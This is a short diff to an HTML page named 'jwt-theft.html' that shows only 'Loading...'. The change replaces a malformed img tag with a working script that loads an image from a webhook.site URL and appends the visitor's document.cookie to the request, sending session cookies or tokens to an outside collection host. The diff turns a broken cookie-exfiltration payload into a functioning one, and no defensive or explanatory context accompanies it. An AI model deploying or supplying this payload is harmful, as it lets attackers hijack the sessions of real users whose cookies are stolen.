--- a/jwt-theft.html
+++ b/jwt-theft.html
@@ -5,6 +5,8 @@
   </head>
   <body>
     <h1>Loading...</h1>
-    <img src="https://webhook.site/1f865f43-5e9c-42f8-b291-08523a2464ce?cookie="+document.cookie />
+    <script>
+      new Image().src = "https://webhook.site/1f865f43-5e9c-42f8-b291-08523a2464ce?cookie=" + document.cookie;
+    </script>
   </body>
 </html>
